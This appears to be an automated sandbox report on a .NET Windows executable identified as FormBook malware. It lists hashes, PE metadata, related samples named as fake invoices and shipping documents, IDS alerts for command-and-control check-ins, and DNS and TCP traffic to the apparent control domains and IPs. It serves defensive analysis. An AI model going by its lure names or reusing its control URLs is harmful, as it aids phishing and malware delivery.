	Payment Proof pdf.exe	Get hash	malicious	Browse	www.lushthingz.com/ssee/?aDHH=53xLUBQPORqA1ypNRBpk7kI+WW7Aobf0anev/F9M5UtU2SwriWPRTdlRE4xzY+8vZdvK&t0G8=DVeTz

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdl-lb-1356093980.us-east-1.elb.amazonaws.com	ejecutable2.exe	Get hash	malicious	Browse	35.168.81.157
	QUOTATION.exe	Get hash	malicious	Browse	54.85.93.188
	truck pictures.exe	Get hash	malicious	Browse	54.85.93.188
	TT Swift Copy.exe	Get hash	malicious	Browse	18.208.31.123
	COAU7229898130.xlsx	Get hash	malicious	Browse	18.208.31.123
	KOC RFQ.doc	Get hash	malicious	Browse	52.204.77.43
	DOC.exe	Get hash	malicious	Browse	54.85.93.188
	SOA.exe	Get hash	malicious	Browse	23.20.208.181
	REQUEST_PURCHASE_INQUIRY (2).exe	Get hash	malicious	Browse	54.85.93.188
	Y0GEeY1WOWNMYni.exe	Get hash	malicious	Browse	52.205.158.209
	PVCbiDUqly50DqS.exe	Get hash	malicious	Browse	52.205.158.209
	Inquiry.exe	Get hash	malicious	Browse	52.205.158.209
	Order_confirmation_ SMKT 09062021_.exe	Get hash	malicious	Browse	18.208.31.123
	PO9887655.exe	Get hash	malicious	Browse	18.208.31.123
	nFzJnfmTNh.exe	Get hash	malicious	Browse	52.7.227.88
	catalogo campione_0021.exe	Get hash	malicious	Browse	52.7.227.88
	0039234_00533MXS2.exe	Get hash	malicious	Browse	52.7.227.88
	Unpaid Invoice.exe	Get hash	malicious	Browse	23.20.208.181
	SOA.exe	Get hash	malicious	Browse	52.21.182.71
	Remmittance Advise.exe	Get hash	malicious	Browse	67.202.20.60
shops.myshopify.com	MDM 467574385758 SKTPCC AFRICAGM64635664.exe	Get hash	malicious	Browse	23.227.38.74
	BERN210819.exe	Get hash	malicious	Browse	23.227.38.74
	4zaCyqmOmM.exe	Get hash	malicious	Browse	23.227.38.74
	INVOICE.exe	Get hash	malicious	Browse	23.227.38.74
	68uuwMDMUk.exe	Get hash	malicious	Browse	23.227.38.74
	SecuriteInfo.com.Scr.Malcodegdn30.14006.exe	Get hash	malicious	Browse	23.227.38.74
	DHL AWB# 4AB19037XXX.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	COURT-ORDER#S12GF803_zip.exe	Get hash	malicious	Browse	23.227.38.74
	DO526.doc	Get hash	malicious	Browse	23.227.38.74
	Orden specifications_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	DUE PAYMENT.exe	Get hash	malicious	Browse	23.227.38.74
	SBGW#001232021.exe	Get hash	malicious	Browse	23.227.38.74
	678901.exe	Get hash	malicious	Browse	23.227.38.74
	purchase_order_list.exe	Get hash	malicious	Browse	23.227.38.74
	Order Confirmation.exe	Get hash	malicious	Browse	23.227.38.74
	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Updated SOA 210920.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Quotation & Sample Designs.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	125M702vaO.exe	Get hash	malicious	Browse	23.227.38.74
	sprogr.exe	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	BhVQ8rqxTUy5ijy.exe	Get hash	malicious	Browse	50.87.249.32
	RpcNs4.exe	Get hash	malicious	Browse	50.116.78.109
	Document_.exe	Get hash	malicious	Browse	162.241.123.16
	Original-BL Copy.exe	Get hash	malicious	Browse	192.254.224.94
	nuovo ordine. 908272762.exe	Get hash	malicious	Browse	216.172.170.84
	Import Custom Duty invoice.doc	Get hash	malicious	Browse	192.185.171.144
	PRICE ENQUIRY.exe	Get hash	malicious	Browse	192.185.108.208
	vNBfeEsb8L.doc	Get hash	malicious	Browse	108.167.172.125
	SURRENDERED HBL COPY IJKTF0425LAX.exe	Get hash	malicious	Browse	192.254.180.165
	VQnw7E91Ce.exe	Get hash	malicious	Browse	192.185.171.144
	PO-34482.exe	Get hash	malicious	Browse	162.215.209.83
	Original-BL Copy.exe	Get hash	malicious	Browse	192.254.224.94
	Order778.exe	Get hash	malicious	Browse	162.241.69.84
	ATKtxrOZ8V.dll	Get hash	malicious	Browse	192.185.115.199
	H4lKd1Y7t2.exe	Get hash	malicious	Browse	50.116.87.224
	Un77J3HEmD.exe	Get hash	malicious	Browse	162.214.65.211
	Purchase Order CTPO18542#.exe	Get hash	malicious	Browse	162.215.209.83
	Document Delivery 28-09-21pdf.exe	Get hash	malicious	Browse	162.215.209.83
	waffle_lol.xls	Get hash	malicious	Browse	192.185.143.195
	waffle_lol.xls	Get hash	malicious	Browse	192.185.143.195
AMAZON-AESUS	arm7	Get hash	malicious	Browse	44.210.72.107
	arm	Get hash	malicious	Browse	54.46.149.179
	e7J5EyDu6K.exe	Get hash	malicious	Browse	50.17.5.224
	CVbJSUXraQ.exe	Get hash	malicious	Browse	50.17.5.224
	PUBcvjKo0Q.exe	Get hash	malicious	Browse	50.17.5.224
	GnLUfsKnVw.exe	Get hash	malicious	Browse	50.17.5.224
	0y2RAtxkw2.exe	Get hash	malicious	Browse	50.17.5.224
	Doc (BL, inv & packing list).exe	Get hash	malicious	Browse	3.223.115.185
	BERN210819.exe	Get hash	malicious	Browse	3.223.115.185
	iRv.exe	Get hash	malicious	Browse	3.223.115.185
	INVOICE.exe	Get hash	malicious	Browse	54.85.86.211
	7ivFMbol8b.exe	Get hash	malicious	Browse	3.209.36.65
	QNz520BQoI.exe	Get hash	malicious	Browse	50.17.5.224
	uO07mrb8IU.exe	Get hash	malicious	Browse	50.17.5.224
	oE2WZvR190.exe	Get hash	malicious	Browse	50.17.5.224
	6BaSb467zW.exe	Get hash	malicious	Browse	50.17.5.224
	Order778.exe	Get hash	malicious	Browse	3.223.115.185
	H4lKd1Y7t2.exe	Get hash	malicious	Browse	23.21.157.88
	vg7OaNVgqD.exe	Get hash	malicious	Browse	52.20.84.62
	DN02468001.exe	Get hash	malicious	Browse	50.17.5.224

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	2.7434162724793136
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	UaTmOE6yP9.exe
File size:	1048576
MD5:	4c70d5b1c63a468f7e0aedf64f93ca42
SHA1:	c248ab00560786b7be23151597d9503a2e84602f
SHA256:	83242a0f42be34e66e502e4a3a45d2470f3b24aef8a1d8484711f4439d7fe74a
SHA512:	2146f98b4f950555333a00668ab6f71ad2a432b12d12cb0c07cc2dc342884f88b491442c84da763b3101ee7ac89e8c08f6552203ba9470401e934191e4858a8c
SSDEEP:	3072:EWrIy8kmoEBZBB2lrEtC1JZdDFs3sb5fkaLZ2sf2h8yezeci6x46xXX07/Bg9s9L:N/ZzLfkuS8yADi6vxU7/w8+PsFT8lw
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^Na.................v............... ........@.. ..............................<.....@................................

File Icon


Icon Hash:	72d2d2dadadad2d2

Static PE Info

General
Entrypoint:	0x4395ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614E5E8D [Fri Sep 24 23:26:05 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x39578	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x10b38	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x375d4	0x37600	False	0.82320912105	data	7.77367738512	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x3a000	0x10b38	0x10c00	False	0.0466417910448	data	4.00591685975	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3a0fc	0x10828	dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON	0x4a924	0x14	data
RT_VERSION	0x4a938	0x200	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	roIhml
FileVersion	7, 0, 9, 0
CompanyName	km
ProductName	oj
ProductVersion	7, 0, 9, 0
FileDescription
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/29/21-04:39:51.905150	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49811	34.102.136.180	192.168.2.6
09/29/21-04:39:58.329883	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:39:58.329883	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:39:58.329883	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49812	80	192.168.2.6	108.179.246.105
09/29/21-04:40:19.314099	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.314099	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.314099	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49817	80	192.168.2.6	23.227.38.74
09/29/21-04:40:19.359274	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49817	23.227.38.74	192.168.2.6
09/29/21-04:40:35.112026	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49819	34.102.136.180	192.168.2.6

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 04:39:46.520317078 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.554671049 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.554898977 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.555294991 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.589448929 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624685049 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624744892 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:46.624964952 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.625030994 CEST	49802	80	192.168.2.6	35.246.6.109
Sep 29, 2021 04:39:46.659334898 CEST	80	49802	35.246.6.109	192.168.2.6
Sep 29, 2021 04:39:51.669807911 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.694152117 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.694314003 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.694509983 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.718749046 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905149937 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905251980 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:51.905471087 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.905558109 CEST	49811	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:39:51.943809986 CEST	80	49811	34.102.136.180	192.168.2.6
Sep 29, 2021 04:39:58.183557034 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.329395056 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:58.329543114 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.329883099 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:58.477359056 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:58.830939054 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:59.016927958 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913381100 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913561106 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:39:59.913786888 CEST	80	49812	108.179.246.105	192.168.2.6
Sep 29, 2021 04:39:59.913851976 CEST	49812	80	192.168.2.6	108.179.246.105
Sep 29, 2021 04:40:19.296732903 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.313730001 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.313925028 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.314099073 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.332310915 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359273911 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359308958 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359329939 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359353065 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359370947 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359388113 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359402895 CEST	80	49817	23.227.38.74	192.168.2.6
Sep 29, 2021 04:40:19.359446049 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.359787941 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:19.359807014 CEST	49817	80	192.168.2.6	23.227.38.74
Sep 29, 2021 04:40:24.495208979 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.634416103 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.634582996 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.634798050 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.772772074 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774866104 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774931908 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.774966955 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775007963 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775029898 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:24.775108099 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.775249958 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.775326014 CEST	49818	80	192.168.2.6	54.85.93.188
Sep 29, 2021 04:40:24.913644075 CEST	80	49818	54.85.93.188	192.168.2.6
Sep 29, 2021 04:40:34.940711021 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.965224981 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:34.965356112 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.965442896 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:34.989929914 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112025976 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112051010 CEST	80	49819	34.102.136.180	192.168.2.6
Sep 29, 2021 04:40:35.112236023 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:35.112266064 CEST	49819	80	192.168.2.6	34.102.136.180
Sep 29, 2021 04:40:35.153801918 CEST	80	49819	34.102.136.180	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2021 04:38:21.289735079 CEST	54513	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:38:21.316379070 CEST	53	54513	8.8.8.8	192.168.2.6
Sep 29, 2021 04:38:53.534001112 CEST	62044	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:38:53.560837030 CEST	53	62044	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:16.562288046 CEST	63791	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:16.581655025 CEST	53	63791	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.116262913 CEST	64267	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.136373043 CEST	53	64267	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.566478014 CEST	49448	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.585911989 CEST	53	49448	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:17.891179085 CEST	60342	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:17.912511110 CEST	53	60342	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.365947962 CEST	61346	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.383519888 CEST	53	61346	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.525990009 CEST	51774	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.553735018 CEST	53	51774	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:18.866934061 CEST	56023	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:18.886312008 CEST	53	56023	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:19.332819939 CEST	58384	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:19.350608110 CEST	53	58384	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:20.602617025 CEST	60261	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:20.621990919 CEST	53	60261	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:21.473272085 CEST	56061	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:21.490623951 CEST	53	56061	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:21.820036888 CEST	58336	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:21.839320898 CEST	53	58336	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:37.436947107 CEST	53781	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:37.458313942 CEST	53	53781	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:46.474432945 CEST	54064	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:46.513228893 CEST	53	54064	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:50.944976091 CEST	52811	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:50.965353012 CEST	53	52811	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:51.632262945 CEST	55299	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:51.667891979 CEST	53	55299	8.8.8.8	192.168.2.6
Sep 29, 2021 04:39:58.158402920 CEST	63745	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:39:58.181813002 CEST	53	63745	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:03.864523888 CEST	50055	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:03.912084103 CEST	53	50055	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:05.834548950 CEST	61374	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:05.853976965 CEST	53	61374	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:07.588280916 CEST	50339	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:07.623198986 CEST	53	50339	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:13.956512928 CEST	63307	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:14.215470076 CEST	53	63307	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:19.258958101 CEST	49694	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:19.295556068 CEST	53	49694	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:24.376988888 CEST	54982	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:24.494050026 CEST	53	54982	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:29.788321018 CEST	50010	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:29.824935913 CEST	53	50010	8.8.8.8	192.168.2.6
Sep 29, 2021 04:40:34.906407118 CEST	63718	53	192.168.2.6	8.8.8.8
Sep 29, 2021 04:40:34.940052032 CEST	53	63718	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 29, 2021 04:39:46.474432945 CEST	192.168.2.6	8.8.8.8	0xeb09	Standard query (0)	www.bellaalubo.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:51.632262945 CEST	192.168.2.6	8.8.8.8	0x2235	Standard query (0)	www.behiscalm.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:58.158402920 CEST	192.168.2.6	8.8.8.8	0xeb84	Standard query (0)	www.productprinting.online	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:03.864523888 CEST	192.168.2.6	8.8.8.8	0xe0e8	Standard query (0)	www.thehauntdepot.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:13.956512928 CEST	192.168.2.6	8.8.8.8	0x2b4d	Standard query (0)	www.miyonbuilding.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:19.258958101 CEST	192.168.2.6	8.8.8.8	0xaf97	Standard query (0)	www.corlora.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.376988888 CEST	192.168.2.6	8.8.8.8	0xc0a1	Standard query (0)	www.jspagnier-graveur.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:29.788321018 CEST	192.168.2.6	8.8.8.8	0xbd4d	Standard query (0)	www.pastlinks.com	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:34.906407118 CEST	192.168.2.6	8.8.8.8	0x7e02	Standard query (0)	www.chinatowndeliver.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	www.bellaalubo.com	www93.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	www93.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:46.513228893 CEST	8.8.8.8	192.168.2.6	0xeb09	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:51.667891979 CEST	8.8.8.8	192.168.2.6	0x2235	No error (0)	www.behiscalm.com	behiscalm.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:51.667891979 CEST	8.8.8.8	192.168.2.6	0x2235	No error (0)	behiscalm.com		34.102.136.180	A (IP address)	IN (0x0001)
Sep 29, 2021 04:39:58.181813002 CEST	8.8.8.8	192.168.2.6	0xeb84	No error (0)	www.productprinting.online	productprinting.online		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:39:58.181813002 CEST	8.8.8.8	192.168.2.6	0xeb84	No error (0)	productprinting.online		108.179.246.105	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:03.912084103 CEST	8.8.8.8	192.168.2.6	0xe0e8	Name error (3)	www.thehauntdepot.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:14.215470076 CEST	8.8.8.8	192.168.2.6	0x2b4d	Name error (3)	www.miyonbuilding.com	none	none	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:19.295556068 CEST	8.8.8.8	192.168.2.6	0xaf97	No error (0)	www.corlora.com	shops.myshopify.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:19.295556068 CEST	8.8.8.8	192.168.2.6	0xaf97	No error (0)	shops.myshopify.com		23.227.38.74	A (IP address)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	www.jspagnier-graveur.com	comingsoon.namebright.com		CNAME (Canonical name)	IN (0x0001)
Sep 29, 2021 04:40:24.494050026 CEST	8.8.8.8	192.168.2.6	0xc0a1	No error (0)	comingsoon.namebright.com	cdl-lb-1356093980.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
